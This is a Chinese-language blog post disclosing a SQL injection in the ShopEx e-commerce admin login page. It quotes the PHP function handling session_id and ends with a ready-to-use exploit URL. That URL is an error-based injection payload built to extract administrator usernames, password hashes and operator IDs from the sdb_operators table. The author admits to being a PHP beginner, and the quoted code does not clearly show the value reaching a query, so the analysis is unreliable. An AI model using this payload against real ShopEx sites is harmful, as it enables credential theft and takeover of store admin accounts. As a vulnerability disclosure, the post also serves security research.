Shopex后台登录页面注入漏洞附利用POC

对登录时传递的某参数未做过滤,导致注入的产生
最近做二次开发的时候看到了登录的流程
发现在文件shopexcoreadmincontrollerctl.passport.php
处理了验证码,管理帐号和密码,但是在最底下发现一个sess_id

function certi_validate(){
        $cert = $this->system->loadModel('service/certificate');
        $sess_id = $_POST['session_id'];

        $return = array();
        if($sess_id == $cert->get_sess()){
            $return = array(
                'res' => 'succ',
                'msg' => '',
                'info' => ''
            );

            echo json_encode($return);
        }else{
            $return = array(
                'res' => 'fail',
                'msg' => '000001',
                'info' => 'You have the different session!'
            );

            echo json_encode($return);
        }
    }

没做处理。直接导致sql注入产生。还在学php,分析错的地方请指正
http://www.xxx.com/shopadmin/index.php?ctl=passport&act=login&sess_id=1

20131017185926

利用:

http://www.xxx.com/shopadmin/index.php?ctl=passport&act=login&sess_id=1'+and(select+1+from(select+count(*),concat((select+(select+(select+concat(userpass,0x7e,username,0x7e,op_id)+from+sdb_operators+Order+by+username+limit+0,1)+)+from+`information_schema`.tables+limit+0,1),floor(rand(0)*2))x+from+`information_schema`.tables+group+by+x)a)+and+'1'='1

作者:saline

本文固定链接: https://www.unhonker.com/bug/1423.html | 90' s Blog|关注网络信息安全

该日志由 unhonker 于2013年10月17日发表在 漏洞公布 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: Shopex后台登录页面注入漏洞附利用POC | 90' s Blog|关注网络信息安全
关键字:

Shopex后台登录页面注入漏洞附利用POC:等您坐沙发呢!

发表评论

您必须 [ 登录 ] 才能发表留言!